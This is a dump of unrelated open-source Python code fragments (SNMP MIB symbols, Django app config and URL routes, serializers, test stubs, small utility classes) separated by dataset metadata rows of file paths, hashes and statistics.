dataCollectionCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3))
dataCollectionCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1))
dataCollectionCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3))
dataCollectionCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3, 2))
mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-DataCollectionMIB", mscColSpComponentName=mscColSpComponentName, dataCollectionCapabilitiesCA02=dataCollectionCapabilitiesCA02, mscColAgCurrentQueueSize=mscColAgCurrentQueueSize, mscColProvEntry=mscColProvEntry, mscColAgRowStatus=mscColAgRowStatus, mscColTimesRowStatus=mscColTimesRowStatus, mscColRowStatusTable=mscColRowStatusTable, mscColStorageType=mscColStorageType, mscColSpStorageType=mscColSpStorageType, mscColSpCurrentQueueSize=mscColSpCurrentQueueSize, mscColSpRowStatusEntry=mscColSpRowStatusEntry, mscColSpRowStatusTable=mscColSpRowStatusTable, mscColStatsEntry=mscColStatsEntry, mscColProvTable=mscColProvTable, mscColRecordsDiscarded=mscColRecordsDiscarded, mscColTimesValue=mscColTimesValue, mscColPeakRowStatus=mscColPeakRowStatus, mscColSpSpoolingFileName=mscColSpSpoolingFileName, mscColRecordsRx=mscColRecordsRx, mscColSpSpooling=mscColSpSpooling, mscColAgStatsTable=mscColAgStatsTable, dataCollectionCapabilitiesCA=dataCollectionCapabilitiesCA, mscColLastEntry=mscColLastEntry, mscColSpRowStatus=mscColSpRowStatus, dataCollectionGroupCA02=dataCollectionGroupCA02, mscColAg=mscColAg, mscColAgentQueueSize=mscColAgentQueueSize, mscColAgComponentName=mscColAgComponentName, mscColAgAgentStatsTable=mscColAgAgentStatsTable, mscColSpStateTable=mscColSpStateTable, mscColSpMaximumNumberOfFiles=mscColSpMaximumNumberOfFiles, mscColSpStatsTable=mscColSpStatsTable, mscColPeakValue=mscColPeakValue, mscColSpOperEntry=mscColSpOperEntry, mscColAgIndex=mscColAgIndex, mscColSpProceduralStatus=mscColSpProceduralStatus, dataCollectionMIB=dataCollectionMIB, dataCollectionGroupCA=dataCollectionGroupCA, mscColSpAvailabilityStatus=mscColSpAvailabilityStatus, mscColTimesTable=mscColTimesTable, mscColSpRecordsRx=mscColSpRecordsRx, mscColRowStatusEntry=mscColRowStatusEntry, mscColSpProvEntry=mscColSpProvEntry, dataCollectionCapabilities=dataCollectionCapabilities, mscColSpIndex=mscColSpIndex, mscColIndex=mscColIndex, mscColSpOperationalState=mscColSpOperationalState, mscColSpStateEntry=mscColSpStateEntry, mscColLastTable=mscColLastTable, mscColAgRecordsRx=mscColAgRecordsRx, mscColAgRowStatusTable=mscColAgRowStatusTable, mscColSp=mscColSp, mscColSpUnknownStatus=mscColSpUnknownStatus, mscColAgStatsEntry=mscColAgStatsEntry, mscColLastValue=mscColLastValue, mscColSpStandbyStatus=mscColSpStandbyStatus, dataCollectionGroup=dataCollectionGroup, mscColAgRowStatusEntry=mscColAgRowStatusEntry, mscColStatsTable=mscColStatsTable, mscColSpProvTable=mscColSpProvTable, mscColAgAgentStatsEntry=mscColAgAgentStatsEntry, mscColSpAdminState=mscColSpAdminState, mscColComponentName=mscColComponentName, mscColCurrentQueueSize=mscColCurrentQueueSize, mscColPeakEntry=mscColPeakEntry, mscColAgRecordsDiscarded=mscColAgRecordsDiscarded, mscColRowStatus=mscColRowStatus, mscColPeakTable=mscColPeakTable, mscColAgRecordsNotGenerated=mscColAgRecordsNotGenerated, dataCollectionCapabilitiesCA02A=dataCollectionCapabilitiesCA02A, mscCol=mscCol, mscColSpStatsEntry=mscColSpStatsEntry, mscColSpRecordsDiscarded=mscColSpRecordsDiscarded, mscColTimesEntry=mscColTimesEntry, mscColSpControlStatus=mscColSpControlStatus, mscColSpUsageState=mscColSpUsageState, dataCollectionGroupCA02A=dataCollectionGroupCA02A, mscColAgStorageType=mscColAgStorageType, mscColSpAlarmStatus=mscColSpAlarmStatus, mscColSpOperTable=mscColSpOperTable)
| 191.15812 | 3,370 | 0.794617 | 5,734 | 44,731 | 6.198814 | 0.123474 | 0.045915 | 0.080351 | 0.009003 | 0.521044 | 0.398998 | 0.367854 | 0.362734 | 0.333924 | 0.310995 | 0 | 0.046845 | 0.109007 | 44,731 | 233 | 3,371 | 191.978541 | 0.844988 | 0.008629 | 0 | 0 | 0 | 0.119469 | 0.480512 | 0.034103 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.084071 | 0.039823 | 0 | 0.039823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
6b1986265c356937240c8f049e4c27f556e3ad32 | 203 | py | Python | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | from django.apps import AppConfig


class ExtendedUserAuthConfig(AppConfig):
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'python_web_framework_project_defense.extended_user_auth'
| 29 | 68 | 0.82266 | 24 | 203 | 6.625 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108374 | 203 | 6 | 69 | 33.833333 | 0.878453 | 0 | 0 | 0 | 0 | 0 | 0.413793 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b2789562eb8efddec5ec7449dee11fe69846fac | 1,257 | py | Python | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 4 | 2015-02-20T08:11:59.000Z | 2019-05-15T23:48:11.000Z | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 58 | 2015-01-11T02:10:09.000Z | 2022-03-20T01:20:15.000Z | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 1 | 2016-06-15T00:49:44.000Z | 2016-06-15T00:49:44.000Z | # urls.py
from __future__ import absolute_import
from django.conf.urls import include, url
from haystack.generic_views import SearchView
from haystack.forms import SearchForm
from .views import MySearchView
import cloud_notes.views
# required to set an app name to resolve 'url' in templates with namespacing
app_name = "cloud_notes"
urlpatterns = [
    url(r'^$', cloud_notes.views.list),
    url(r'^new/', cloud_notes.views.new_note),
    url(r'^preview/(\d+)', cloud_notes.views.preview),
    url(r'^edit/(\d+)', cloud_notes.views.edit_note),
    url(r'^trash/(\d+)', cloud_notes.views.trash_note),
    url(r'^empty_trash/', cloud_notes.views.empty_trash),
    url(r'^delete/(\d+)', cloud_notes.views.delete_note),
    url(r'^upload/', cloud_notes.views.upload_note),
    url(r'^export/', cloud_notes.views.export),
    url(r'^export_all/', cloud_notes.views.export_all),
    url(r'^import/', cloud_notes.views.import_file),
    url(r'^import_all/', cloud_notes.views.import_all),
    url(r'^folders/', cloud_notes.views.folders),
    url(r'^hash_tags/', cloud_notes.views.hash_tags),
    url(r'^download/(\d+)', cloud_notes.views.download),
    url(r'^search/', cloud_notes.views.MySearchView.as_view(form_class=SearchForm), name='search_view'),
]
| 40.548387 | 106 | 0.718377 | 189 | 1,257 | 4.555556 | 0.285714 | 0.209059 | 0.296167 | 0.092915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117741 | 1,257 | 30 | 107 | 41.9 | 0.776375 | 0.065235 | 0 | 0 | 0 | 0 | 0.156143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.32 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
6b34b62ff9176d754e62eb3c435d235886456de0 | 224 | py | Python | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | null | null | null | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | 1 | 2021-06-01T22:06:38.000Z | 2021-06-01T22:06:38.000Z | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import sys
import unittest
class TestUpload(unittest.TestCase):
def test_upload(self):
pass
def test_remove(self):
pass
if __name__ == '__main__':
unittest.main()
| 13.176471 | 36 | 0.616071 | 26 | 224 | 4.923077 | 0.692308 | 0.109375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006061 | 0.263393 | 224 | 16 | 37 | 14 | 0.769697 | 0.089286 | 0 | 0.222222 | 0 | 0 | 0.039604 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.222222 | 0.222222 | 0 | 0.555556 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
6b36941c3ad4d3977e550da048bd026bd39e5196 | 302 | py | Python | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | __author__ = 'Tom Schaul, tom@idsia.ch'
from random import choice
from .captureplayer import CapturePlayer
class RandomCapturePlayer(CapturePlayer):
""" do random moves in the capture game"""
def getAction(self):
return [self.color, choice(self.game.getLegals(self.color))] | 25.166667 | 68 | 0.715232 | 36 | 302 | 5.888889 | 0.666667 | 0.084906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18543 | 302 | 12 | 68 | 25.166667 | 0.861789 | 0.115894 | 0 | 0 | 0 | 0 | 0.091954 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 3 |
6b44f8e8ae27a08bdbd449c05fa181aea67c9352 | 3,241 | py | Python | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | null | null | null | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | 1 | 2021-03-05T15:00:38.000Z | 2021-03-05T15:00:38.000Z | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from . import models
class TransferRequestSerializer(serializers.ModelSerializer):
org_name = serializers.CharField(source='organization.org_name')
class Meta:
model = models.TransferRequest
fields = (
'id', 'str_identify', 'org_name', 'str_to_house', 'str_from_house', 'str_date', 'str_department',
'str_status','str_creator', 'str_creator_identify', 'str_created_at'
)
class TransferRequestDetailSerializer(serializers.ModelSerializer):
str_identify = serializers.CharField(source='transfer_request.str_identify')
trd_identify = serializers.CharField(source='material.material_identify')
trd_name = serializers.CharField(source='material.material_name')
trd_specification = serializers.CharField(source='material.material_specification')
trd_model = serializers.CharField(source='material.material_model')
trd_measure = serializers.CharField(source='material.measure_name')
class Meta:
model = models.TransferRequestDetail
fields = (
'id', 'str_identify', 'trd_identify', 'trd_name', 'trd_specification', 'trd_model', 'trd_measure',
'trd_num', 'trd_present_num', 'trd_used', 'trd_remarks'
)
class TransferRequestDetailToTransferDetailSerializer(serializers.ModelSerializer):
str_identify = serializers.CharField(source='transfer_request.str_identify')
td_identify = serializers.CharField(source='material.material_identify')
td_name = serializers.CharField(source='material.material_name')
td_specification = serializers.CharField(source='material.material_specification')
td_model = serializers.CharField(source='material.material_model')
td_measure = serializers.CharField(source='material.measure_name')
td_apply_num = serializers.CharField(source='trd_num')
class Meta:
model = models.TransferRequestDetail
fields = (
'id', 'str_identify', 'td_identify', 'td_name', 'td_specification', 'td_model', 'td_measure', 'td_apply_num'
)
class TransferSerializer(serializers.ModelSerializer):
org_name = serializers.CharField(source='organization.org_name')
class Meta:
model = models.Transfer
fields = (
'id', 'st_identify', 'org_name', 'st_to_house', 'st_from_house', 'st_date', 'st_status', 'st_creator',
'st_creator_identify', 'st_created_at'
)
class TransferDetailSerializer(serializers.ModelSerializer):
st_identify = serializers.CharField(source='transfer.st_identify')
td_identify = serializers.CharField(source='material.material_identify')
td_name = serializers.CharField(source='material.material_name')
td_specification = serializers.CharField(source='material.material_specification')
td_model = serializers.CharField(source='material.material_model')
td_measure = serializers.CharField(source='material.measure_name')
class Meta:
model = models.TransferDetail
fields = (
'id', 'str_identify', 'st_identify', 'td_identify', 'td_name', 'td_specification', 'td_model', 'td_measure',
            'td_apply_num', 'td_real_num', 'td_present_num', 'td_remarks'
) | 45.013889 | 120 | 0.724468 | 340 | 3,241 | 6.594118 | 0.144118 | 0.187333 | 0.243533 | 0.227475 | 0.689563 | 0.67083 | 0.67083 | 0.569135 | 0.569135 | 0.5281 | 0 | 0 | 0.161678 | 3,241 | 72 | 121 | 45.013889 | 0.825175 | 0 | 0 | 0.45614 | 0 | 0 | 0.320481 | 0.144664 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035088 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
860f15449ffd7b916eb81156f97cf4a7427d9bfc | 120 | py | Python | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | from gym.envs.registration import register
register(
id='antnest-v0',
entry_point='antnest.envs:AntNestEnv',
)
| 17.142857 | 42 | 0.733333 | 15 | 120 | 5.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.141667 | 120 | 6 | 43 | 20 | 0.834951 | 0 | 0 | 0 | 0 | 0 | 0.275 | 0.191667 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8612a7432e2a2ecf2a7b2210ba9155777f131c66 | 473 | py | Python | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: __init__.py
author: Cyrus Harrison <cyrush@llnl.gov>
created: 7/6/2020
description:
Init file for 'visit_utils.builtin' module.
"""
from .evalfuncs import *
from .writescript import WriteScript
from .convert2to3 import ConvertPy2to3 | 31.533333 | 73 | 0.769556 | 64 | 473 | 5.609375 | 0.765625 | 0.044568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025063 | 0.156448 | 473 | 15 | 74 | 31.533333 | 0.874687 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
862b954f750bb811af31e158371b5f4caeac3f34 | 340 | py | Python | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2019-12-23T21:52:23.000Z | 2019-12-23T21:52:23.000Z | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | null | null | null | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 2 | 2021-11-13T01:34:15.000Z | 2021-11-13T01:34:34.000Z | from jade2.basic.path import *
def get_common_flags_string_for_init(flags_name = "common_flags.flags"):
"""
Get a string of common flags as specified in the database.
:return: str
"""
return " ".join([ line.strip() for line in open(get_rosetta_flags_path()+'/'+flags_name, 'r') if line and not line.startswith('#')])
| 30.909091 | 136 | 0.685294 | 51 | 340 | 4.352941 | 0.627451 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003571 | 0.176471 | 340 | 10 | 137 | 34 | 0.789286 | 0.208824 | 0 | 0 | 0 | 0 | 0.088353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
86378030ffb7a008ace921889a0f6c81d8965897 | 1,565 | py | Python | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | null | null | null | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 8 | 2017-03-07T01:23:22.000Z | 2019-10-24T22:45:46.000Z | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 3 | 2017-03-13T11:15:19.000Z | 2019-03-24T21:47:05.000Z | from api.exception import *
from api.alpineobject import AlpineObject
class TouchPoint(AlpineObject):
def __init__(self, base_url, session, token):
super(TouchPoint, self).__init__(base_url, session, token)
def add_touchpoint(self, touchpoint_name, workfile_id, workspace_id, touchpoint_description):
"""
Does nothing
:param touchpoint_name:
:param workfile_id:
:param workspace_id:
:param touchpoint_description:
:return:
"""
pass
def delete_touchpoint(self, touchpoint_name, workspace_id):
"""
Does nothing
:param touchpoint_name:
:param workspace_id:
:return:
"""
pass
def publish_touchpoint(self, workspace_id, touchpoint_name):
pass
def unpublish_touchpoint(self, workspace_id, touchpoint_name):
pass
def run_touchpoint(self, workspace_id, touchpoint_name, output_table, parameter_list=None):
pass
def stop_touchpoint(self, workspace_id, touchpoint_name):
pass
def get_touchpoint_list(self, workspace_id=None):
pass
def get_touchpoint_info(self, touchpoint_name):
pass
def get_touchpoint_id(self, touchpoint_name):
pass
def add_touchpoint_parameter(self, workspace_id, touchpoint_name, variable_name, data_type,
variable_label, variable_desc, options, required_val, use_default):
pass
def get_touchpoint_parameters(self, workspace_id, touchpoint_name):
pass
| 26.083333 | 97 | 0.668371 | 172 | 1,565 | 5.726744 | 0.284884 | 0.170558 | 0.149239 | 0.152284 | 0.390863 | 0.33198 | 0.140102 | 0.140102 | 0 | 0 | 0 | 0 | 0.259425 | 1,565 | 59 | 98 | 26.525424 | 0.849871 | 0.11885 | 0 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.392857 | 0.071429 | 0 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8639bc81e6a1d5c69c20797cee962de7e7df13c0 | 1,155 | py | Python | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | from __future__ import annotations
from component import *
from typing import Dict, Any, List, Tuple
from utils import *
import gi
gi.require_version('Atspi', '2.0')
from gi.repository import Atspi
class Container(E2eComponent):
    # Attributes
# Constructor
def __init__(self: Container, obj: Atspi.Object):
super().__init__(obj)
# Public Methods
def get_childrens(self: Container) -> List[E2eComponent]:
childrens = [self.component.get_child_at_index(i)
for i in range(self.component.get_child_count())]
return Utils.to_e2e_list(childrens)
def get_childrens_number(self: Container) -> int:
return len(self.get_childrens())
def get_descendants(self: Container) -> List[E2eComponent]:
childrens = []
for obj in Utils.tree_walk(self.component):
childrens.append(obj)
return Utils.to_e2e_list(childrens)
def get_descendants_number(self: Container) -> int:
return len(self.get_descendants())
def is_parent_of(self: Container, child: E2eComponent) -> bool:
return child.component.get_parent() == self.component
| 28.875 | 70 | 0.684848 | 142 | 1,155 | 5.330986 | 0.387324 | 0.103038 | 0.059445 | 0.076618 | 0.293263 | 0.192867 | 0.192867 | 0.192867 | 0 | 0 | 0 | 0.00882 | 0.214719 | 1,155 | 39 | 71 | 29.615385 | 0.825799 | 0.031169 | 0 | 0.08 | 0 | 0 | 0.007175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.24 | 0.12 | 0.72 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
864de2366e0badfd5eaa5e2e35d4298c9984af96 | 386 | py | Python | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | 1 | 2019-08-17T21:20:48.000Z | 2019-08-17T21:20:48.000Z | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | null | null | null | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Using the classifier
--------------------
.. toctree::
:maxdepth: 3
cv/base
cv/data
cv/helper
Cross-validation in MRIQC
-------------------------
.. toctree::
:maxdepth: 3
cv/experiments
"""
| 14.846154 | 73 | 0.523316 | 50 | 386 | 4.04 | 0.74 | 0.148515 | 0.158416 | 0.178218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.202073 | 386 | 25 | 74 | 15.44 | 0.633117 | 0.953368 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8652e9b06d7a64b3de9ec8c032f891de24bf0135 | 869 | py | Python | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | 1 | 2016-09-30T13:52:01.000Z | 2016-09-30T13:52:01.000Z | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | 3 | 2016-09-29T22:10:45.000Z | 2016-09-30T14:03:10.000Z | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | null | null | null | import configparser
BOOLEAN_TRUE = set(['true'])
def unquote(string):
"""
    Unquote escape sequences in the given string.
TODO: implement this
"""
return string
class Config:
def __init__(self, config):
self.config = config
def sections(self):
return self.config.sections()
def __getitem__(self, section):
return Section(self.config[section])
class Section:
def __init__(self, section):
self.section = section
def get(self, key):
value = self.section.get(key)
if value is None:
return None
if value.startswith('"') and value.endswith('"'):
return unquote(value[1:-1])
return value
def getboolean(self, key):
value = self.get(key)
if value is None:
return None
return value in BOOLEAN_TRUE
| 19.311111 | 57 | 0.597238 | 102 | 869 | 4.95098 | 0.352941 | 0.079208 | 0.043564 | 0.063366 | 0.114851 | 0.114851 | 0.114851 | 0.114851 | 0 | 0 | 0 | 0.003306 | 0.303797 | 869 | 44 | 58 | 19.75 | 0.831405 | 0.075949 | 0 | 0.153846 | 0 | 0 | 0.007663 | 0 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.269231 | false | 0 | 0.038462 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
867259bc377f0dc64ef6ea3a154fe7023103a89d | 51,739 | py | Python | src/sage/combinat/sf/sf.py | drvinceknight/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | 2 | 2015-08-11T05:05:47.000Z | 2019-05-15T17:27:25.000Z | src/sage/combinat/sf/sf.py | kaushik94/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/sf/sf.py | kaushik94/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | 1 | 2020-07-24T12:04:03.000Z | 2020-07-24T12:04:03.000Z | """
